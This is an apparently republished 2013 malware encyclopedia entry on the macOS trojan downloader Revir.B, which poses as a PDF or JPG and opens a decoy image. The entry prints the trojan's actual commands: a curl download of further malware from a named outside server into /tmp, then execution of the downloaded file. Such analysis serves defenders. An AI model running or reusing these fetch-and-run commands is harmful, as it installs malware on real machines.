SecurityHome.eu TrojanDownloader:MacOS

Home / malware PDF

TrojanDownloader:MacOS_X/Revir.B

First posted on 31 January 2013.
Source: Microsoft
Aliases :
There are no other names known for TrojanDownloader:MacOS_X/Revir.B.
Explanation :

TrojanDownloader:MacOS_X/Revir.B may arrive on your computer as an attachment or link within an email that is sent to you. The attachment or link may appear to be a legitimate PDF or JPG file.

When you open the attachment or click the link, the trojan will run.

Installation

TrojanDownloader:MacOS_X/Revir.B drops an image file (JPG) file in the temporary folder ("~/tmp").

The trojan opens the JPG file in an attempt to hide its malicious behavior from you.

Payload

When opened, TrojanDownloader:MacOS_X/Revir.B runs from the following location:

~/tmp/host

The downloader connects to a server and downloads other malware, such as Backdoor:MacOS_X/Imuler.A, by using the following command:

curl -o /tmp/updtdata http://tarmu.narod.ru /<removed>

The trojan runs the downloaded file by using the following command:

/tmp/updtdata

Related encyclopedia entries

Backdoor:MacOS_X/Imuler.A

Analysis by Methusela Cebrian Ferrer

Last update 31 January 2013

TOP

Malware :

Last 20

Family:

TrojanDownloader:MacOS_X/Revir.B